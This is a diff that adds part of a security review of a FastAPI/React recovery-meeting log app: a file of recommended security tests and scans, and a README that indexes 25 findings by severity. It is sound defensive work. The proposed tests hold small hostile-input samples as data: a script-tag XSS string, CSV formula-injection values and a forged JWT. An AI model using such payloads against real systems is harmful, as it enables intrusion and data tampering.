@@ -1,0 +1,167 @@
+# [Informational] Security testing gaps
+
+## Summary
+
+The project has strong functional-test discipline (coverage thresholds, mutation testing via Stryker/mutmut, pre-commit linters). It does **not** yet have targeted *security* tests. This file lists recommended additions, classified by test pyramid layer.
+
+## Static analysis (already partial)
+
+Present:
+- `bandit` — Python static SAST (configured in `pyproject.toml`, runs in pre-commit).
+- `ruff` — includes some security-relevant rules (`S` plugin isn't enabled currently — consider adding `"S"` to the ruff select list).
+- `detect-secrets` — prevents obvious credentials from being committed.
+- `mypy --strict` — type safety (prevents many logic bugs that would manifest as authZ holes).
+
+Recommended additions:
+- **`ruff` with Bandit rules:** add `"S"` to `[tool.ruff.lint] select = [...]` — overlaps with bandit but reports during normal ruff run.
+- **`semgrep --config auto`** in CI — finds OWASP-pattern issues (e.g. `f"...<...{var}..."` HTML emission, `except Exception: pass`).
+- **CodeQL** weekly for Python + TypeScript ([#14](./14-medium-dependency-pinning-and-scanning.md)).
+- **`pip-audit`** / **`npm audit`** gates in CI ([#14](./14-medium-dependency-pinning-and-scanning.md)).
+- **Trivy fs** scan for Dockerfile, lockfiles, and embedded config ([#15](./15-medium-docker-container-hardening.md)).
+
+## Unit tests
+
+Add the following under `backend/tests/security/`:
+
+```python
+# backend/tests/security/test_config.py
+def test_missing_secret_key_fails(monkeypatch):
+    monkeypatch.delenv("RD_LOG_SECRET_KEY", raising=False)
+    monkeypatch.setenv("RD_LOG_ENVIRONMENT", "production")
+    with pytest.raises(Exception):
+        importlib.reload(config)
+
+def test_dev_secret_in_source_removed():
+    # assert the dev-secret string no longer appears in app/*.py
+    root = pathlib.Path("backend/app")
+    for p in root.rglob("*.py"):
+        assert "dev-secret-key-change-in-production" not in p.read_text()
+```
+
+```python
+# backend/tests/security/test_password_policy.py
+def test_reject_short_password(client):
+    r = client.post("/auth/register", json={"username": "u", "password": "short"})
+    assert r.status_code == 422
+
+def test_reject_over_72_bytes(client):
+    r = client.post("/auth/register", json={"username": "u", "password": "A" * 100})
+    assert r.status_code == 422
+```
+
+```python
+# backend/tests/security/test_html_escape.py
+def test_printable_export_escapes_group_name(client, auth, db):
+    set_group_name(db, "<script>x</script>")
+    body = client.get("/api/export/printable", headers=auth).text
+    assert "<script>x</script>" not in body
+    assert "&lt;script&gt;" in body
+```
+
+```python
+# backend/tests/security/test_csv_injection.py
+@pytest.mark.parametrize("payload", ["=1+1", "+SUM(A1)", "-2+3", "@A1", "\tleading"])
+def test_csv_neutralises_formula(payload, client, auth, db):
+    set_speaker_name(db, payload)
+    body = client.get("/api/export/csv", headers=auth).text
+    for line in body.splitlines()[1:]:
+        assert not any(field.startswith((c, '"' + c)) for field in line.split(",") for c in "=+-@\t")
+```
+
+```python
+# backend/tests/security/test_authorization.py
+def test_cross_group_isolation(client, alice_token, bob_token, bob_group):
+    r = client.get(f"/api/overrides/", headers={"Authorization": f"Bearer {alice_token}"})
+    assert bob_group_id_not_in(r.json(), bob_group)
+
+def test_member_cannot_change_settings(member_client):
+    r = member_client.put("/api/settings/", json={"name": "evil"})
+    assert r.status_code == 403
+
+def test_forged_jwt_rejected(client):
+    forged = jwt.encode({"sub": "1", "exp": 9999999999}, "wrong-key", algorithm="HS256")
+    r = client.get("/api/meetings/upcoming", headers={"Authorization": f"Bearer {forged}"})
+    assert r.status_code == 401
+```
+
+```python
+# backend/tests/security/test_rate_limit.py
+def test_login_rate_limited(client):
+    for _ in range(5):
+        client.post("/auth/login", data={"username": "x", "password": "y"})
+    r = client.post("/auth/login", data={"username": "x", "password": "y"})
+    assert r.status_code == 429
+```
+
+```python
+# backend/tests/security/test_headers.py
+def test_security_headers(client):
+    r = client.get("/api/health")
+    assert "content-security-policy" in r.headers
+    assert r.headers["x-content-type-options"] == "nosniff"
+    assert "referrer-policy" in r.headers
+```
+
+## Property-based tests (hypothesis)
+
+```python
+# backend/tests/security/test_property.py
+from hypothesis import given, strategies as st
+
+@given(st.text(min_size=0, max_size=2000))
+def test_speaker_name_roundtrip_csv(name):
+    # After going through generate_csv_export, the speaker cell must parse back to the original.
+    ...
+
+@given(st.text())
+def test_topic_name_html_safe(name):
+    out = render_printable_cell(name)
+    assert "<script" not in out.lower() or "&lt;script" in out.lower()
+```
+
+## Integration / end-to-end (Playwright or Cypress, future)
+
+- Login / logout flows.
+- XSS regression: inject payload, open printable export, assert no `alert` fires and no `localStorage` read.
+- CORS: test from an allowed and a disallowed origin.
+- CSP violation reporter: set up a `/csp-report` endpoint; alert on unexpected reports from production.
+
+## Dynamic scanning
+
+- **OWASP ZAP baseline scan** in CI (nightly, against a local deploy):
+  ```yaml
+  - uses: zaproxy/action-baseline@v0.12.0
+    with:
+      target: 'http://localhost:8000'
+  ```
+- **nuclei** community templates against a staging endpoint.
+
+## Fuzz testing
+
+FastAPI is Pydantic-driven so most boundary-condition fuzzing shows up as 422s. Still, worth a **hypothesis-fastapi** or **schemathesis** run against the OpenAPI:
+
+```yaml
+- run: |
+    pip install schemathesis
+    schemathesis run http://localhost:8000/api/openapi.json --checks all
+```
+
+## Manual pentest checklist (before public launch)
+
+- [ ] Run through every attack tree in [`22-informational-threat-model.md`](./22-informational-threat-model.md).
+- [ ] Burp repeater: send each endpoint an oversize body (1 MB), malformed JSON, unexpected types.
+- [ ] Subdomain takeover check for the deployed hostname (CNAME to Railway).
+- [ ] `testssl.sh` against the public domain — score A or above.
+- [ ] Logged-out review of `/docs` and `/openapi.json` — disabled in prod.
+- [ ] Dependency re-check week of release.
+
+## Monitoring & alerting
+
+- [ ] 4xx/5xx rate alerts (Grafana Cloud / Datadog / Railway metrics).
+- [ ] Auth failure rate alert (sudden spike → potential credential stuffing).
+- [ ] CSP report-uri alerting.
+- [ ] Weekly `pip-audit` / `npm audit` summary posted to a channel.
+
+## Coverage goal for security tests
+
+A reasonable target: the `backend/tests/security/` directory should reach the same 90% branch-coverage bar as the rest of the tests, and every finding in this review should have at least one regression test tied to its fix PR.

--- a/plans/git-issues/security-review/README.md
+++ b/plans/git-issues/security-review/README.md
@@ -1,0 +1,63 @@
+# Security Review — Recovery Dharma Secretary Log
+
+**Date:** 2026-04-13
+**Branch:** `claude/security-review-analysis-mU0gt`
+**Scope:** Full-stack review of `backend/` (FastAPI / SQLAlchemy / JWT / bcrypt) and `frontend/` (React 19 / Vite / TypeScript), plus infrastructure (`Dockerfile`, `railway.json`), CI/CD (`.github/workflows/`), and pre-commit configuration.
+**Methodology:** OWASP ASVS v4.0.3 (Levels 1–2), OWASP Top 10 (2021), OWASP API Security Top 10 (2023), STRIDE threat modelling, SANS CWE/SANS Top 25, and supply-chain / SSDF practices (NIST SP 800-218). Analysis is code-level (manual review), configuration-level, dependency-surface, and infrastructure.
+
+## How to use this directory
+
+Each file below is drafted as a standalone GitHub Issue. Open each one, validate against your environment, then copy into `gh issue create` (or drop straight into the web UI). Files are numbered by **severity-ordered priority**, not by CVSS alone — practical exploitability, blast radius, and fix-cost all factor into ordering.
+
+> The recommended remediation roadmap lives in [`23-informational-remediation-roadmap.md`](./23-informational-remediation-roadmap.md). Start there if you want a phased plan.
+
+## Quick index
+
+| # | File | Severity | Area |
+|---|------|----------|------|
+| 00 | [00-executive-summary.md](./00-executive-summary.md) | — | Overview, risk ranking, scoring rationale |
+| 01 | [01-critical-hardcoded-dev-secret-fallback.md](./01-critical-hardcoded-dev-secret-fallback.md) | 🔴 Critical | Auth / Config |
+| 02 | [02-critical-stored-xss-html-export.md](./02-critical-stored-xss-html-export.md) | 🔴 Critical | XSS / Export |
+| 03 | [03-high-csv-formula-injection.md](./03-high-csv-formula-injection.md) | 🟠 High | Injection / Export |
+| 04 | [04-high-no-auth-rate-limiting.md](./04-high-no-auth-rate-limiting.md) | 🟠 High | Auth / DoS |
+| 05 | [05-high-jwt-design-weaknesses.md](./05-high-jwt-design-weaknesses.md) | 🟠 High | Auth / Session |
+| 06 | [06-high-token-storage-localstorage-xss.md](./06-high-token-storage-localstorage-xss.md) | 🟠 High | Session / XSS |
+| 07 | [07-high-missing-security-headers.md](./07-high-missing-security-headers.md) | 🟠 High | Transport / Browser |
+| 08 | [08-high-weak-password-policy-bcrypt-truncation.md](./08-high-weak-password-policy-bcrypt-truncation.md) | 🟠 High | Auth / Crypto |
+| 09 | [09-medium-cors-permissive-configuration.md](./09-medium-cors-permissive-configuration.md) | 🟡 Medium | CORS |
+| 10 | [10-medium-username-enumeration.md](./10-medium-username-enumeration.md) | 🟡 Medium | Information disclosure |
+| 11 | [11-medium-invite-code-abuse.md](./11-medium-invite-code-abuse.md) | 🟡 Medium | Auth / Access control |
+| 12 | [12-medium-no-rbac-or-admin-roles.md](./12-medium-no-rbac-or-admin-roles.md) | 🟡 Medium | Authorization |
+| 13 | [13-medium-audit-log-silent-failure.md](./13-medium-audit-log-silent-failure.md) | 🟡 Medium | Logging / Integrity |
+| 14 | [14-medium-dependency-pinning-and-scanning.md](./14-medium-dependency-pinning-and-scanning.md) | 🟡 Medium | Supply chain |
+| 15 | [15-medium-docker-container-hardening.md](./15-medium-docker-container-hardening.md) | 🟡 Medium | Container |
+| 16 | [16-medium-github-actions-abuse.md](./16-medium-github-actions-abuse.md) | 🟡 Medium | CI/CD / Supply chain |
+| 17 | [17-medium-migration-sql-risk-and-race.md](./17-medium-migration-sql-risk-and-race.md) | 🟡 Medium | DB / Operations |
+| 18 | [18-low-error-info-disclosure.md](./18-low-error-info-disclosure.md) | 🟢 Low | Information disclosure |
+| 19 | [19-low-logout-no-revocation.md](./19-low-logout-no-revocation.md) | 🟢 Low | Session |
+| 20 | [20-low-self-registration-open.md](./20-low-self-registration-open.md) | 🟢 Low | Access control |
+| 21 | [21-low-activity-log-injection.md](./21-low-activity-log-injection.md) | 🟢 Low | Logging |
+| 22 | [22-informational-threat-model.md](./22-informational-threat-model.md) | ℹ Info | Threat model |
+| 23 | [23-informational-remediation-roadmap.md](./23-informational-remediation-roadmap.md) | ℹ Info | Roadmap |
+| 24 | [24-informational-security-testing-gaps.md](./24-informational-security-testing-gaps.md) | ℹ Info | Testing |
+
+## Severity legend
+
+- 🔴 **Critical** — Remote compromise of confidentiality, integrity, or availability feasible with low effort. Fix immediately; consider the application unsafe to run on the open internet until addressed.
+- 🟠 **High** — Meaningful weakening of a security boundary; realistic attack paths under normal usage. Fix within days.
+- 🟡 **Medium** — Hardening gaps that combine with other flaws to amplify impact, or require privileged position / unusual conditions.
+- 🟢 **Low** — Defence-in-depth gaps and good-hygiene deviations.
+- ℹ **Informational** — Context, reasoning, or remediation guidance rather than a direct vulnerability.
+
+## Out of scope
+
+- Third-party runtime (Railway platform itself, TLS termination, edge WAF).
+- Protection of the RD Log book content (copyright, not security).
+- Physical / social engineering against operators.
+- Detailed cryptanalysis of bcrypt / HS256 primitives.
+
+## Assumptions
+
+- Deployment target is Railway with HTTPS terminated at the edge; `uvicorn` is reached via HTTP behind that edge.
+- Users are recovery-meeting volunteers (secretaries). The data is sensitive (association with a recovery community, personal names, meeting attendance) but not regulated PHI/PII.
+- A "group" represents one weekly meeting; members of a group trust each other, but members of different groups do **not** trust each other.


### PR DESCRIPTION
Produce a 25-document security review covering the full stack (FastAPI
backend, React SPA, Dockerfile, CI/CD, supply chain). Each file is
drafted as a standalone GitHub Issue with severity, CWEs, OWASP
mapping, attack narratives, code-specific references, and concrete
remediation snippets.

Methodology: OWASP ASVS v4.0.3, OWASP Top 10 (2021), OWASP API
Security Top 10 (2023), STRIDE threat modelling, SSDF (NIST SP 800-218).

Headline findings:
- 2 Critical: hardcoded dev JWT secret fallback (#01); stored XSS in
  HTML export via unescaped f-string interpolation (#02).
- 6 High: CSV formula injection (#03); no auth rate limiting (#04);
  JWT design weaknesses (#05); token in localStorage (#06); missing
  security headers (#07); weak password policy + bcrypt 72-byte
  truncation (#08).
- 9 Medium: permissive CORS (#09); username enumeration (#10); invite
  code brute force (#11); no intra-group RBAC (#12); audit log silent
  failure (#13); unpinned dependencies + no CI audit gate (#14);
  Docker runs as root (#15); GitHub Actions abuse surface (#16);
  startup migration risks (#17).
- 4 Low: error info disclosure (#18); no server-side logout (#19);
  open self-registration (#20); activity-log CRLF injection (#21).
- 3 Informational: STRIDE threat model (#22); phased remediation
  roadmap (#23); security testing gaps (#24).

Output location is `plans/git-issues/security-review/`. Note that
`plans/` is listed in .gitignore as AI-tooling artifacts; these files
are force-added because the review itself is an intentional project
deliverable for this dedicated security-review branch.